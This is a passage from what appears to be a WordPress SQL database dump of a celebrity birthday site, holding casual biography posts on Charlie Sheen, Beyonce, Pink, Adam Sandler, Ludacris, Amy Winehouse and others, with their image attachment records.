A Half Men” after making ill remarks toward the show\'s creator, Chuck Lorre. Shortly after his dismissal, he garnered mounds of attention with his highly publicized meltdown, which resulted in speculation of mental disorders and substance abuse in Sheen\'s life.\r\n<h2>Current Personal Life</h2>\r\nSheen\'s success with acting in movies and TV has, in no way, translated over to his personal life and <a href=\"http://dating.famousfix.com/tpx_479/charlie-sheen/dating\" target=\"_blank\">success in relationships</a>. He has been married three times and has five children, and one grand child. Each relationship (married or not) has ended in controversy; Sheen accidentally shot one of his fiancees, was involved in an escort agency, was accused of alcohol and drug abuse and threats of violence, and was accused of being insane. Throughout his marriages, he also had dating relationships with multiple porn stars and adult film actresses.\r\n\r\nHis issues with drug and alcohol use go back to 1998, when he first overdosed on cocaine. Years 2009, 2010 and 2011 held more trouble for Sheen, as he was arrested for assaulting his wife, served 30 days in a drug rehab center, 30 days of probation and 36 hours of anger management. After some suspected improvement, Sheen removed from the Plaza Hotel after causing $7,000 in damage, and admitting to drinking and using cocaine in his suite the same night. <i> </i>\r\n\r\nPolitically, Sheen has made a name for himself as a strong left-wing advocate and a conspiracy theorist in regards to the September 11, 2001 terrorist attack on America. Sheen believes that the US Government, including former President George W. Bush, are at fault for what he called, a “controlled demolition”.\r\n<h2>Where They Are Now</h2>\r\nSince Sheen\'s highly publicized meltdown in 2011, he has flown under the radar in an attempt to pick up the pieces. Though he\'s slowed down on filming, he has been working, and has a couple of films in post production, including one that will debut later this year.\r\n\r\n[<a href=\"https://www.flickr.com/photos/ikrichter/6550047637/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Charlie Sheen','','publish','open','open','','charlie-sheen','','','2015-10-09 17:07:10','2015-10-09 17:07:10','',0,'http://birthdaypedia.com/?p=254',0,'post','',0),(255,2,'2015-09-15 14:49:12','2015-09-15 14:49:12','','Charlie Sheen','','inherit','open','closed','','charlie-sheen','','','2015-09-15 14:49:20','2015-09-15 14:49:20','',254,'http://birthdaypedia.com/wp-content/uploads/2015/09/Charlie-Sheen.jpg',0,'attachment','image/jpeg',0),(256,2,'2015-09-04 10:09:34','2015-09-04 10:09:34','<h2>In the Beginning</h2>\r\nBeyonce Giselle Knowles was born on September 4, 1981 in <a href=\"http://www.houstontx.gov/\" target=\"_blank\">Houston, Texas</a>. She was one of two girls, and has a younger sister named Solange. Beyonce\'s mother was a hair dresser and a salon owner, and her father sold Xerox machines until leaving his job to support Beyonce\'s career. She enrolled in elementary school dance classes at an early age, and her vocal talent and range was discovered, somewhat by accident, by her dance instructor. At age 7, Beyonce enrolled in a talent show, sang John Lennon\'s “Imagine” and beat kids who were more than twice her age.\r\n\r\nShe continued her involvement in choirs and competitions, and eventually auditioned for an all girl\'s entertainment group. Her father quite his job to manage her career, Beyonce and her friends pressed forward in an attempt to gain the attention of the music industry, and they failed many times over a series of years. The failures proved to be hard on the Knowles family, prompting a separation for Beyonce\'s parents and a move into two separate apartments. The group of girls continued to press on, and in 1996, when Beyonce was 15, they signed with Columbia Records.\r\n<h2>Career Accomplishments</h2>\r\n<a href=\"http://www.destinyschild.com/\" target=\"_blank\">Destiny\'s Child</a> was the group that thrust Beyonce into stardom. The group\'s 1999 album “The Writings on the Wall” featured the groups most popular songs, was a multi-platinum selling album, and won the group their first grammy. Controversy erupted as the success settled, and two of the members left due to disagreements in management styles. Destiny\'s Child eventually became a threesome and grew even more in popularity. In 2001, Beyonce left to pursue her solo career and launched with immediate success.\r\n\r\nBeyonce launched her first album “Dangerously in Love” in 2003, and immediately hit the Billboard Hot 100 chart and would later earn 5 Grammy Awards. Simultaneously, she made a name for herself on the Big Screen as she played alongside Mike Myers in “Austin Powers in Goldmember”. The next several years would involve the release of more records and more films, each climbing higher in success than it\'s predecessor.\r\n\r\nBeyonce\'s 2008 release of her album “I Am... Sasha Fierce” introduced the world to her overly sexy, aggressive and sassy alter ego, who she claims was put into place to inspire and promote confidence on stage. The album earned Beyonce a record breaking six Grammy Awards, including Song of the Year. Around this time, Beyonce married rapper Jay-Z, who was already working well with Beyonce to continue to thrust her career forward. As her albums released over years, it became clear to her followers that Beyonce would never settled into a niche with her sound. Rather, she would continued to explore new tones, genres and sounds as she felt inspired.\r\n\r\nIn 2010, Beyonce began managing her own music, and soon released her album “4”, and then in 2013, “Beyonce”. Each of these albums are noted for being more soulful and slightly darker, with very personal themes throughout.\r\n\r\nTo date, she has won 20 Grammy Awards, and is one of the best selling music artists of all time. TIME Magazine has named her among the 100 most influential people in the world, and Forbes has listed her as the most powerful female musician this year.\r\n<h2>Most Known For<i> </i></h2>\r\nBeyonce is a powerhouse of a human. With stellar success in her music career, her reputation as one of the best entertainers of today, her philanthropic efforts, and openly powerful demeanor for her career, there\'s not much that she\'s not known for. Those who have followed her from the start of her solo career in the early 2000\'s will never forget her involvement with Destiny\'s Child, although today she\'s most well known for her solo work, specifically in her most recent self titled album, “Beyonce”. Each album has contained hit after hit, making not one stand out more than another.\r\n\r\nAside from her success in music, she\'s most known for her success as a powerful and talented women as it pertains to her net worth. She has surpassed icons like Madonna and Celine Dion as the highest paid music personality of all time, and paired with husband Jay Z, the two are a wealth of success in finance.\r\n\r\nIf it\'s not her music, her demeanor or her money that people are talking about, it\'s most likely her private marriage with husband Jay Z. The content of her music reflects real life for the two – including the highlights and struggles of the everyday couple. Though they sing openly about their relationship, they keep the details of their day to day life very private.\r\n<h2>Current Personal Life<i> </i></h2>\r\nBeyonce and Jay Z have a little girl, Blue Ivy, who was born in 2012 after some time of struggling with pregnancy. They are very open about their struggles, speaking openly about a miscarriage that took place in 2010.\r\n\r\nBeyonce and Jay Z have done a wealth of good with their fame and fortune, and have been very involved in political campaigns that they care about. <a href=\"http://birthdaypedia.com/barack-obama/\">President Obama</a> and the First Lady are good friends of the couple, and have been supported by them financially and via publicized media in the past. <a href=\"http://www.usmagazine.com/celebrity-news/news/beyonce-jay-z-share-adorable-kiss-in-italy-see-the-pda-pics-2015149\" target=\"_blank\">She and Jay Z</a> have contributed in many ways to efforts after Hurricane Katrina, Hurricane Ike, Earthquake Relief in Haiti, and the Sandy Hook Elementary shooting, among several other causes. <i> </i>\r\n\r\nBeyonce refers to herself as a modern day feminist, and has openly supported causes like Same Sex Marriage, the ONE Campaign, and the condemnation of George Zimmerman for the shooting of Trayvon Martin.\r\n<h2>Where They Are Now<i> </i></h2>\r\nBeyonce continues to focus on her career in music as well as her family. She\'s currently between the album release and touring, and has not made an open statement regarding the release of another album.\r\n\r\n[<a href=\"https://www.flickr.com/photos/128992077@N07/15741839050/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Beyonce Knowles','','publish','open','open','','beyonce-knowles','','','2015-10-09 16:56:19','2015-10-09 16:56:19','',0,'http://birthdaypedia.com/?p=256',0,'post','',0),(257,2,'2015-09-15 15:09:06','2015-09-15 15:09:06','','Beyonce','','inherit','open','closed','','beyonce','','','2015-09-15 15:09:12','2015-09-15 15:09:12','',256,'http://birthdaypedia.com/wp-content/uploads/2015/09/Beyonce.jpg',0,'attachment','image/jpeg',0),(258,2,'2015-09-07 10:11:41','2015-09-07 10:11:41','<h2>In the Beginning</h2>\r\n<a href=\"http://www.imdb.com/name/nm0256237/\" target=\"_blank\">Michael Emerson</a> was born on September 7, 1954 in Cedar Rapids, Iowa, where he was raised and attended elementary, middle and high school. He began his college career studying theater at Drake University in Des Moines, and then he moved to New York City to further pursue a career in acting. He ended up working as a freelance illustrator as he wasn\'t able to find work acting, and then in \'86 he moved to Jacksonville, Florida, where he performed in local theater and taught at a local college.\r\n<h2>Career Accomplishments</h2>\r\nEmerson\'s career got off to a very slow start, as he pursued acting for years before ever landing a big time role on television. The 90\'s saw him through some fairly decent roles in theater, such as “Gross Indecency: The Three Trials of Oscar Wilde”, “Le Misanthrope”, “The Iceman Cometh” and “Give Me Your Answer, Do!”\r\n\r\nIn the early 2000\'s, he won an <a href=\"http://lostpedia.wikia.com/wiki/Michael_Emerson\" target=\"_blank\">Emmy Award</a> for his guest appearance in several episodes of popular TV show, “The Practice”. Several years later, he was a debuted his role on “Lost”, which continued over several seasons, and for which he received an Emmy Award and a Golden Globe Award.\r\n<h2>Most Known For</h2>\r\nEmerson is most well known for his roles in major television shows. He played a serial killer over several episodes on “The Practice”, and held a starring role in “<a href=\"http://www.imdb.com/title/tt0411008/\" target=\"_blank\">Lost</a>”. In addition, he played Zep in the very first “Saw” movie, which is perhaps his biggest success on the Big Screen in film.\r\n<h2>Current Personal Life</h2>\r\nEmerson has been married to wife Carrie President since 1998. They met while he was performing in a local theater production of “Hamlet” early on in his career.\r\n\r\nEmerson has been well involved in charities and philanthropic work during his career, supporting many causes linked to the theater community such as The Actor\'s Fund, <a href=\"https://www.broadwaycares.org/\" target=\"_blank\">Broadway Cares</a>, and Off-Off Broadway. He also has publicly supported Habitat for Humanity and several local radio stations. <i> </i>\r\n<h2>Where They Are Now<i> </i></h2>\r\nEmerson and his wife continue to act on stage and in films, occasionally dabbling in film making themselves. He has most recently played the role of Howard Finch in <a href=\"http://www.imdb.com/title/tt1839578/\" target=\"_blank\">“Person of Interest”</a>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/titi64/9350864593/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Michael Emerson','','publish','open','open','','michael-emerson','','','2015-10-09 16:55:52','2015-10-09 16:55:52','',0,'http://birthdaypedia.com/?p=258',0,'post','',0),(259,2,'2015-09-15 15:23:15','2015-09-15 15:23:15','','Michael Emerson','','inherit','open','closed','','michael-emerson','','','2015-09-15 15:23:22','2015-09-15 15:23:22','',258,'http://birthdaypedia.com/wp-content/uploads/2015/09/Michael-Emerson.jpg',0,'attachment','image/jpeg',0),(260,2,'2015-09-08 10:05:35','2015-09-08 10:05:35','<h2><span style=\"font-weight: 400;\">In the Beginning</span></h2>\r\n<span style=\"font-weight: 400;\">Alecia Beth Moore, more commonly known as <a href=\"http://www.pinkspage.com/us/news\" target=\"_blank\">Pink</a>, was born on September 8, 1979 in Doylestown, Pennsylvania. Her parents separated early on in her life after a series of marital problems, an issue that she would later grow to write about in her music. She began singing and writing music in high school, competing in fun competitions and writing in order to release feelings of angst. </span>\r\n\r\n<span style=\"font-weight: 400;\">At 14 years old, she adopted the stage name “Pink”, which had already been a long time nickname based off the extreme character Mr. Pink in the movie “Reservoir Dogs”. Pink wrote and sang about personal things that effected her emotionally, and she began performing her music to downtown clubs. At 16 years old, she joined a band named “Choice” that released a song that was featured on a kid\'s film, and soon after that she went solo. </span>\r\n<h2><span style=\"font-weight: 400;\">Career Accomplishments</span></h2>\r\n<span style=\"font-weight: 400;\">Pink\'s band “Choice” kickstarted her career, but it became clear early on that the other girls in the band would only hold her back. After she launched her solo career in 1998, she began working with well known producers like Babyface and Kandi Burruss. She released her first solo single “There You Go” in 2000, and it became her first top ten hit on the Billboard Hot 100 chart. The album that followed was called “Can\'t Take Me Home”, and was certified Double Platinum. </span>\r\n\r\n<span style=\"font-weight: 400;\">Soon after the release of that first album, Pink won Billboard\'s Female New Artist of the Year and began touring with NSYNC for their tour. Her next hit came in 2001, when she teamed up with big names Christina Aguilera, Mya and Lil\' Kim for a cover of “<a href=\"https://en.wikipedia.org/wiki/Lady_Marmalade\" target=\"_blank\">Lady Marmalade</a>” on the soundtrack of “Moulin Rouge!”. The song won Pink her first Grammy for Best Pop Collaboration with Vocals. </span>\r\n\r\n<span style=\"font-weight: 400;\">Pink\'s next album was called “Missundaztood”, and was launched as a dark answer to the accusation that Pink was just another pop act. With several record setting and chart topping hits on the album, it remains Pink\'s best selling record and helped earn her the top spot on the Female Billboard 200 Artist of 2002. </span>\r\n\r\n<span style=\"font-weight: 400;\">“Try This” and “I\'m Not Dead” were her next two albums, neither of which garnered near as much success as those that were launched before. Still, the years during the launches of these records saw her team up with several big names for music videos and tours – like <a href=\"http://birthdaypedia.com/lindsay-lohan/\">Lindsay Lohan</a>, Jessica Simpson, Mary-Kate Olson, Justin Timberlake, and India. Arie. </span>\r\n\r\n<span style=\"font-weight: 400;\">Her next single “So What” quickly launched her back to the top, and became a number one hit on the Billboard Hot 100 list. She toured the following years and gained a lot of success at her acrobatic performances on stage while singing. </span>\r\n\r\n<span style=\"font-weight: 400;\">Since then, her latest albums have been widely successful, earning her several Grammy Nominations and other awards. </span>\r\n<h2><span style=\"font-weight: 400;\">Most Known For </span></h2>\r\n<span style=\"font-weight: 400;\">Pink is most well known for her dark, real and powerful vocals, specifically in her albums “Can\'t Take Me Home” and “Missundaztood”. Her most famous tracks include “There You Go”, “Most Girls”, “Lady Marmalade”, “Get the Party Started”, “Just Like a Pill”, “Raise Your Glass” and “Just Give Me A Reason”. </span>\r\n\r\n<span style=\"font-weight: 400;\">She\'s known for bucking the system in her appearance, straying away from more conventional or traditional looks and trending toward more daring and outlandish appearances – spiking and coloring her hair, wearing dreadlocks, and dressing in a very eclectic way. </span>\r\n<h2><span style=\"font-weight: 400;\">Current Personal Life </span></h2>\r\n<span style=\"font-weight: 400;\">Pink is widely outspoken regarding her support of <a href=\"http://www.peta.org/international/\" target=\"_blank\">PETA</a> and as an animal activist, and claims to be “mostly” vegan. Other efforts that she openly supports include LGBT rights and same sex marriage, Human Rights Campaign, ONE Campaign, Save the Children and <a href=\"http://www.unicef.org/\" target=\"_blank\">UNICEF</a>. </span>\r\n\r\n<span style=\"font-weight: 400;\">Pink is married to Motocross driver Carey Hart. The two met in 2001 and married in Costa Rica in 2006. Though they split in early 2008, they sought counseling and officially reconciled in 2010. She\'s open about the struggles in their relationship, as she writes about them frequently in her music. The two gave birth to a little girl named Willow in June 2011. </span>\r\n<h2><span style=\"font-weight: 400;\">Where They Are Now </span></h2>\r\n<span style=\"font-weight: 400;\">Pink continues to top charts with her music but hasn\'t recorded or released an album since joining efforts with another artist to form the band “You+Me” in 2014. </span>\r\n\r\n<a href=\"https://www.flickr.com/photos/erintheredmc/11901667626/sizes/z/\" target=\"_blank\">[Image]</a>\r\n\r\n ','Pink','','publish','open','open','','pink','','','2015-10-09 16:52:29','2015-10-09 16:52:29','',0,'http://birthdaypedia.com/?p=260',0,'post','',0),(262,2,'2015-09-09 09:30:40','2015-09-09 09:30:40','<h2><span style=\"font-weight: 400;\">In the Beginning</span></h2>\r\n<span style=\"font-weight: 400;\"><a href=\"http://www.webbyawards.com/winners/2005/web/general-website/celebrityfan/adam-sandler-official-fan-site/\" target=\"_blank\">Adam Sandler</a> was born on September 9, 1966 in Brooklyn, New York. His mother was a school teacher and his father was an electrical engineer. Sandler comes from Jewish and Russian ancestry, and is very open about his Jewish background today. Sandler attended and graduated from New York University\'s Tisch School of the Arts in 1988 before making his debut in film exactly one year later. </span>\r\n<h2><span style=\"font-weight: 400;\">Career Accomplishments</span></h2>\r\n<span style=\"font-weight: 400;\">Sandler started his career with minor guest roles in relatively famous TV Shows like “The Cosby Show” until he got a job as a writer for Saturday Night Live in 1990. He made a name for himself in comedy in the following years when he began featuring himself and his cleverly comedic songs on the show before being fired by NBC in 1995. </span>\r\n\r\n<span style=\"font-weight: 400;\">He starred in several films in the 90\'s, like “Coneheads”, “Airheads”, “Billy Madison”, “Bulletproof” “Happy Gilmore”, “The Wedding Singer” and “The Waterboy”. Each film, though lacking in critical praise, earned him increasing popularity amongst the world of comedy. In 2002, critical praise came with his release of “Punch-Drunk Love”, in which he played a more serious role to a well written script. The movie earned him a Golden Globe nomination and kicked off a series of more serious films for Sandler, including “Spanglish”, and “Reign Over Me”. </span>\r\n\r\n<span style=\"font-weight: 400;\">The 2000\'s saw his involvement in several heartwarming and comedic films alongside other great actors like Kevin James, Judd Apatow, Jennifer Aniston, Drew Barrymore, and several others. Movies like “I Now Pronounce You Chuck and Larry”, “Funny People”, “Grown Ups”, “Just Go With It”, and “50 First Dates” all got positive reviews from audiences. </span>\r\n<h2><span style=\"font-weight: 400;\">Most Known For </span></h2>\r\n<span style=\"font-weight: 400;\">Sandler is most well known for his slapstick comedic roles in movies like “Happy Gilmore”, “<a href=\"http://www.imdb.com/title/tt0120888/\" target=\"_blank\">The Wedding Singer</a>”, “Billy Madison” and “The Waterboy”. Madison recognized this early on and formed a film production company called Happy Madison Productions, which has produced most of Sandler\'s films to date. Most of the company\'s films have terrible critic reviews but have been well received by audiences and done very well at the box office. </span>\r\n<h2><span style=\"font-weight: 400;\">Current Personal Life </span></h2>\r\n<span style=\"font-weight: 400;\">Sandler has been married to actress <a href=\"https://en.wikipedia.org/wiki/Jackie_Sandler\" target=\"_blank\">Jacqueline Titone</a> since 2003, and they have two daughters together: Sadie and Sunny. He\'s contributed financially in significant amounts to his home town\'s Boys and Girls Club, and has shown support financially to former New York City Republican mayor <a href=\"http://www.biography.com/people/rudolph-giuliani-9312674\" target=\"_blank\">Rudy Giuliani</a>. </span>\r\n<h2><span style=\"font-weight: 400;\">Where They Are Now </span></h2>\r\n<span style=\"font-weight: 400;\">Sandler resides with his family in one of his three homes, either in Los Angeles, New York City or Florida, and continues to make audiences cry with laughter with his movies. </span>\r\n\r\n<a href=\"https://www.flickr.com/photos/charlott_l/4844464097/sizes/l\" target=\"_blank\">[Image]</a>\r\n\r\n ','Adam Sandler','','publish','open','open','','adam-sandler','','','2015-10-09 16:52:06','2015-10-09 16:52:06','',0,'http://birthdaypedia.com/?p=262',0,'post','',0),(263,2,'2015-09-15 21:39:54','2015-09-15 21:39:54','','Pink','','inherit','open','closed','','pink','','','2015-09-15 21:39:54','2015-09-15 21:39:54','',260,'http://birthdaypedia.com/wp-content/uploads/2015/09/Pink.jpg',0,'attachment','image/jpeg',0),(264,2,'2015-09-15 21:50:13','2015-09-15 21:50:13','','Adam Sandler','','inherit','open','closed','','adam-sandler','','','2015-09-15 21:50:13','2015-09-15 21:50:13','',262,'http://birthdaypedia.com/wp-content/uploads/2015/09/Adam-Sandler.jpg',0,'attachment','image/jpeg',0),(265,2,'2015-09-10 09:52:34','2015-09-10 09:52:34','<h2><span style=\"font-weight: 400;\">In the Beginning</span></h2>\r\n<span style=\"font-weight: 400;\"><a href=\"http://www.fanpop.com/clubs/ryan-phillippe\" target=\"_blank\">Ryan Phillippe</a> was born on September 10, 1974 in New Castle, Delaware. His mother ran a daycare in the home, and his father was a chemist. Phillippe has three sisters, and attended New Castle Baptist Academy with them, where he excelled in athletics like basketball, soccer and tae kwon do. After high school, he attended a Modeling and Talent agency in Wilmington, Delaware. </span>\r\n<h2><span style=\"font-weight: 400;\">Career Accomplishments</span></h2>\r\n<span style=\"font-weight: 400;\">The early 90\'s held small success for Phillippe, as he made appearances in several TV shows like “One Life to Live”, “Matlock”, and “Due South”. He had small parts in a couple of films along the way, but his first big role came in 1997, when he was cast as a leading role in the horror film, “I Know What You Did Last Summer”. His role in the film invited the attention of more higher profile films. He starred in “54”, “Cruel Intentions” “The Way of the Gun”, “Gosford Park”, and “Crash” in the late 90\'s and early 2000\'s. </span>\r\n\r\n<span style=\"font-weight: 400;\">His career hit new heights for him personally when he starred in the war film “<a href=\"http://www.imdb.com/title/tt0418689/\" target=\"_blank\">Flags of Our Fathers</a>”, which was directed by Clint Eastwood. Phillippe noted that the film meant a lot to him, as both his grandfathers fought in World War II. Critics claim that the role was Phillippe\'s best performance ever. </span>\r\n\r\n<span style=\"font-weight: 400;\">The years following would see Phillipe\'s involvement in several other films, acting and filming, the most successful being “The Lincoln Lawyer”, which he filmed and starred in, alongside Matthew McConaughey. “Revenge for Jolly!”, and “Setup” were other relatively successful movies that Phillippe filmed. </span>\r\n\r\n<span style=\"font-weight: 400;\">Since 2012, Phillippe has turned his attention to directing and producing, and has been working with critically acclaimed TV shows like “Damages”. </span>\r\n<h2><span style=\"font-weight: 400;\">Most Known For </span></h2>\r\n<span style=\"font-weight: 400;\">Phillippe is most well known for his success as a heart-throb in teen driven movies like “I Know What You Did Last Summer”, “Cruel Intentions” and “54”. Critics rave over his performance in “Flags of Our Fathers”, and call it his best performance ever. In his later years, he\'s more notable in his efforts toward filming than he is acting, and “The Lincoln Lawyer” granted him plenty of positive attention in that right. </span>\r\n<h2><span style=\"font-weight: 400;\">Current Personal Life </span></h2>\r\n<span style=\"font-weight: 400;\">Phillippe married actress <a href=\"https://en.wikipedia.org/wiki/Reese_Witherspoon\" target=\"_blank\">Reese Witherspoon</a> in Charleston, South Carolina in 1999. The two had two kids and were married seven years before divorcing due to irreconcilable differences. He shares custody of the children with Witherspoon, although she has sole physical custody of the children. Since their divorce, he has dated actress Abbie Cornish, Alexis Knapp, and most recently (and presently) a law student named Paulina Slagter. He and Knapp do have a daughter together, as well. </span>\r\n<h2><span style=\"font-weight: 400;\">Where They Are Now </span></h2>\r\n<span style=\"font-weight: 400;\">Phillippe continues his involvement with TV Show “<a href=\"http://www.imdb.com/title/tt3516878/\" target=\"_blank\">Secrets and Lies</a>” as the role of Ben Crawford, and continues to fine tune his filming career alongside his acting. </span>\r\n\r\n<a href=\"https://www.flickr.com/photos/disneyabc/16282034915/sizes/l\" target=\"_blank\">[Image]</a>\r\n\r\n ','Ryan Phillippe','','publish','open','open','','ryan-phillippe','','','2015-10-09 16:51:12','2015-10-09 16:51:12','',0,'http://birthdaypedia.com/?p=265',0,'post','',0),(266,2,'2015-09-15 21:57:20','2015-09-15 21:57:20','','Ryan Phillippe','','inherit','open','closed','','ryan-phillippe','','','2015-09-15 21:57:20','2015-09-15 21:57:20','',265,'http://birthdaypedia.com/wp-content/uploads/2015/09/Ryan-Phillippe.jpg',0,'attachment','image/jpeg',0),(267,2,'2015-09-11 09:04:25','2015-09-11 09:04:25','<h2><span style=\"font-weight: 400;\">In the Beginning</span></h2>\r\n<span style=\"font-weight: 400;\">Christopher Brian Bridges, more commonly known as “<a href=\"http://www.ludacrisworld.com/\" target=\"_blank\">Ludacris</a>” was born in Champaign, Illinois on September 11, 1977. He was an only child in his household growing up. During his middle school years, his family moved to Chicago. In high school, the family moved to Virginia briefly, and then to Atlanta, Georgia where he graduated in 1995. Bridges studied music management at Georgia State University, but never graduated. </span>\r\n<h2><span style=\"font-weight: 400;\">Career Accomplishments</span></h2>\r\n<span style=\"font-weight: 400;\">Ludacris launched his career as a radio DJ and later collaborated with artist Timbaland on the track “Phat Rabbit”, which was his first hit in many countries. </span>\r\n\r\n<span style=\"font-weight: 400;\">He moved on to creating his first solo album in 1998, with the album entitled, “Incognegro”, which presented his Southern style in rapping with a quick and witty flow. Sales for the album were low, but Ludacris pressed on to release his second album, “Back for the First Time” in the year 2000. Unlike his first album, the second was a major success on the charts. </span>\r\n\r\n<span style=\"font-weight: 400;\">He followed the success of album number two very quickly with the launch of his third, “Word of Mouf”. Singles on the album were nominated for Grammy Awards and topped the charts. </span>\r\n\r\n<span style=\"font-weight: 400;\">Next, Ludacris rolled out the album “Chicken-n-Beer”, which contained songs that were a little edgier, a little more serious, and a little more risque. Though the album wasn\'t as popular as its predecessors, it featured guest appearances that promoted his success, like <a href=\"https://en.wikipedia.org/wiki/Snoop_Dogg\" target=\"_blank\">Snoop Dogg</a>, Chingy, and Shawna. </span>\r\n\r\n<span style=\"font-weight: 400;\">He heated it up with album four, “Splash Waterfalls”, which contained racy songs and videos that couldn\'t be played on regular television. Later that year, he received his first Grammy for his collaboration with Usher and Lil Jon in the hit single, “Yeah!” </span>\r\n\r\n<span style=\"font-weight: 400;\">His next two albums, “The Red Light District” and “Release Therapy” took a new, more serious approach to his music, and included popular rap artists like T.I., Lil Flip, Nas, Trick Daddy, Disturbing tha Peace, Pharrell Williams, R. Kelly, Mary J. Blige, Bobby Valentino and Young Jeezy. The latter album topped the Billboard charts. </span>\r\n\r\n<span style=\"font-weight: 400;\">“Theater of the Mind” and “Battle of the Sexes” were the next two albums, and contained a lineup of guests on the album that topped the impressive line up of albums past – Chris Brown, Lil Wayne, Rick Ross, T.I., Plies, T-Pain, Jay-Z and The Game were some highlights. Again, his albums topped charts and hit milestone success that pushed him to push forward. </span>\r\n\r\n<span style=\"font-weight: 400;\">His most recent album was released in March of this year, and debuted at number three on the Billboard 200 Chart. </span>\r\n\r\n<span style=\"font-weight: 400;\">Alongside his rapping career, Ludacris also made a name for himself as an actor, appearing as significant roles in movies like “Crash”, “Gamer”, “New Year\'s Eve” and “The Fast and the Furious”. </span>\r\n<h2><span style=\"font-weight: 400;\">Most Known For </span></h2>\r\n<span style=\"font-weight: 400;\">Ludacris is most known for his rapping career, specifically with his hit singles, “Southern Hospitality”, “What\'s Your Fantasy”, “Stand Up”, “Roll Out”, “Act a Fool”, “Move Bitch”, “Yeah!”, “Number One Spot”, “Money Maker” and “How Low”. </span>\r\n\r\n<span style=\"font-weight: 400;\">Outside of his rapping career, he\'s known for his supporting role in “The Fast and The Furious” movies. </span>\r\n<h2><span style=\"font-weight: 400;\">Current Personal Life </span></h2>\r\n<span style=\"font-weight: 400;\">Ludacris is currently married to Gabonese model <a href=\"http://www.bustle.com/articles/88098-ludacris-welcomes-baby-with-wife-eudoxie-mbouguiengue-their-announcements-are-super-cute-photos\" target=\"_blank\">Eudoxie Mbouguiengue</a>. The two were engaged and married in Costa Rica in the same day, and have one daughter together. He also has another daughter by another long time friend, who was born while he and Mbouguiengue were still dating. </span>\r\n\r\n<span style=\"font-weight: 400;\">In 2011, he joined a foundation aimed at inspiring youth through education, experiences, and helping them help be self sufficient. </span>\r\n\r\n<span style=\"font-weight: 400;\">Politically, Ludacris has been rudely outspoken in his music regarding political figures like George W. Bush, Hillary Clinton and Jesse Jackson. He\'s also had a riff with media correspondent Bill O\'Reilly since O\'Reilly called for Americans to boycott Pepsi products, as Ludacris represented Pepsi and supported a lifestyle of violence and disrespect toward women. Pepsi promptly fired Ludacris in an effort to save their promotional campaign. </span>\r\n<h2><span style=\"font-weight: 400;\">Where They Are Now </span></h2>\r\n<span style=\"font-weight: 400;\">With the recent launch of his most recent album “Ludaversal”, Ludacris continues to release singles and work on upcoming albums and films. </span>\r\n\r\n<a href=\"https://www.flickr.com/photos/dvids/5157874521/sizes/z/\" target=\"_blank\">[Image]</a>\r\n\r\n ','Ludacris','','publish','open','open','','ludacris','','','2015-10-09 16:47:50','2015-10-09 16:47:50','',0,'http://birthdaypedia.com/?p=267',0,'post','',0),(268,2,'2015-09-15 22:12:50','2015-09-15 22:12:50','','Ludacris concert at Fort Meade','','inherit','open','closed','','ludacris-concert-at-fort-meade','','','2015-09-15 22:20:36','2015-09-15 22:20:36','',267,'http://birthdaypedia.com/wp-content/uploads/2015/09/Ludacris.jpg',0,'attachment','image/jpeg',0),(269,2,'2015-09-14 10:13:42','2015-09-14 10:13:42','<h2>In the Beginning</h2>\r\n<span style=\"font-weight: 400;\"><a href=\"http://www.amywinehouse.com/\" target=\"_blank\">Amy Winehouse</a> was born on September 14, 1983 in North London, England. She was the younger of two siblings, and she and her older brother grew up with their parents in London\'s Southgate area. Winehouse was born into a family of musicians, primarily jazz. Her uncles and her grandmother were all professionals in the music industry, and greatly inspired her interest in jazz and music in general. </span>\r\n\r\n<span style=\"font-weight: 400;\">When Winehouse was 9, her parents separated. That same year, she enrolled in a local theatre school in order to further her vocal education and performance. She attended the weekend only school for several years and then enrolled in full time training at a more prestigious school for the arts. Though there are rumors that Winehouse was expelled, close friends and family says that she simply changed schools. Around that time, Winehouse bought her first guitar and began writing music. </span>\r\n<h2><span style=\"font-weight: 400;\">Career Accomplishments</span></h2>\r\n<span style=\"font-weight: 400;\">Winehouse launched her first album n 2003, called “Frank”. The album contained mostly songs influenced by jazz, and a couple of covers. Later that year, the album topped the charts in the UK, and achieved platinum status in sales. Later in 2004, she teamed up with Salaam Remi and made the single “Stronger Than Me”, which was very well received. </span>\r\n\r\n<span style=\"font-weight: 400;\">Album number two, “<a href=\"http://pitchfork.com/reviews/albums/10032-back-to-black/\" target=\"_blank\">Back to Black</a>”, launched in 2006 and was heavily influenced by 50\'s and 60\'s girl groups. The album was number one in the UK for a few weeks, and was the best selling album in 2007. The popularity climbed high as well in the United States, with the album topping out at number 7 on the Billboard 200 Charts. </span>\r\n\r\n<span style=\"font-weight: 400;\">Rehab was her biggest single in the US on the album, and TIME Magazine named it the Best Song of 2007. She toured after the album release, and half the tour was a raging success. In November 2007, her tour screeched to a halt as she became obviously intoxicated before a few different shows. Crowds booed her for poor performance, and she ended up canceling the remainder of her performances to focus on her health.</span>\r\n\r\n<span style=\"font-weight: 400;\">2008 brought loads of more success, and was the year that she began winning Grammy Awards. She won four different Grammy\'s for “Back to Black”, and one as Best New Artist. The feat earned her a spot in the Guinness Book of World Records for Most Grammy Awards won by a British Female Act. As if her album sales weren\'t already sky high, the Grammy Awards launched sales to new heights for Winehouse, who continued to win Awards on MTV for her music. </span>\r\n\r\n<span style=\"font-weight: 400;\">The next couple of years held memorable performances, tributes, honors and awards dedicated to the singer who was making headlines with her success. She began recording her third album, and continued to tour. Her performances became memorable in negative ways, as she would forget the lyrics to songs, end sets mid-song, and had little to no energy for her sets. In Summer 2011, Winehouse took more time off to sort herself out. </span>\r\n\r\n<span style=\"font-weight: 400;\">The next year, projects would be released that continued to launch Winehouse to the peak of popularity, despite tragedy, with projects recorded with <a href=\"http://www.ew.com/article/2011/09/09/tony-bennett-amy-winehouse-body-and-soul-preview\" target=\"_blank\">Tony Bennett</a>, and an album of unreleased materials over the years, called “Lioness: Hidden Treasures”. </span>\r\n<h2><span style=\"font-weight: 400;\">Most Known For </span></h2>\r\n<span style=\"font-weight: 400;\">Winehouse is most well known for her soulful and powerful voice that reinvigorated jazz and soul for a younger generation. Unfortunately, her drug and alcohol problems garnered much attention, and she became widely known as a women who struggled daily with these things, even within her music. </span>\r\n\r\n<span style=\"font-weight: 400;\">“Back to Black” was the album that launched her to success in the US, and her single “Rehab” became a staple that represented Winehouse in a brilliant way. </span>\r\n<h2><span style=\"font-weight: 400;\">Current Personal Life </span></h2>\r\n<span style=\"font-weight: 